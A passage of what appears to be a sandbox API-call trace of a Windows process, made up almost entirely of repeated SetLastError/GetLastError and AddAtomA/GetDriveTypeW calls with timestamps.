SetLastError 
(dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.396] GetLastError () returned 0x0 [0174.396] SetLastError (dwErrCode=0x0) [0174.398] GetLastError () returned 0x0 [0174.398] SetLastError (dwErrCode=0x0) [0174.398] GetLastError () returned 0x0 [0174.398] SetLastError (dwErrCode=0x0) [0174.398] GetLastError () returned 0x0 [0174.398] SetLastError (dwErrCode=0x0) [0174.398] GetLastError () returned 0x0 [0174.398] SetLastError (dwErrCode=0x0) [0174.398] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError (dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.399] SetLastError 
(dwErrCode=0x0) [0174.399] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.400] SetLastError (dwErrCode=0x0) [0174.400] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.401] SetLastError (dwErrCode=0x0) [0174.401] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError 
(dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.403] SetLastError (dwErrCode=0x0) [0174.403] GetLastError () returned 0x0 [0174.403] SetLastError (dwErrCode=0x0) [0174.403] GetLastError () returned 0x0 [0174.403] SetLastError (dwErrCode=0x0) [0174.403] GetLastError () returned 0x0 [0174.403] SetLastError (dwErrCode=0x0) [0174.403] GetLastError () returned 0x0 [0174.403] SetLastError (dwErrCode=0x0) [0174.404] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0174.404] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0174.404] GetLastError () returned 0x0 [0174.404] SetLastError (dwErrCode=0x0) [0174.404] GetLastError () returned 0x0 [0174.404] SetLastError (dwErrCode=0x0) [0174.406] AddAtomA (lpString=0x0) returned 0x0 [0174.406] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.406] AddAtomA (lpString=0x0) 
returned 0x0 [0174.406] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.406] AddAtomA (lpString=0x0) returned 0x0 [0174.406] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.406] AddAtomA (lpString=0x0) returned 0x0 [0174.406] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.406] AddAtomA (lpString=0x0) returned 0x0 [0174.406] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.406] AddAtomA (lpString=0x0) returned 0x0 [0174.406] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.406] AddAtomA (lpString=0x0) returned 0x0 [0174.406] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.406] AddAtomA (lpString=0x0) returned 0x0 [0174.406] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.406] AddAtomA (lpString=0x0) returned 0x0 [0174.406] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) 
returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) 
returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
[0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW 
(lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) 
returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 
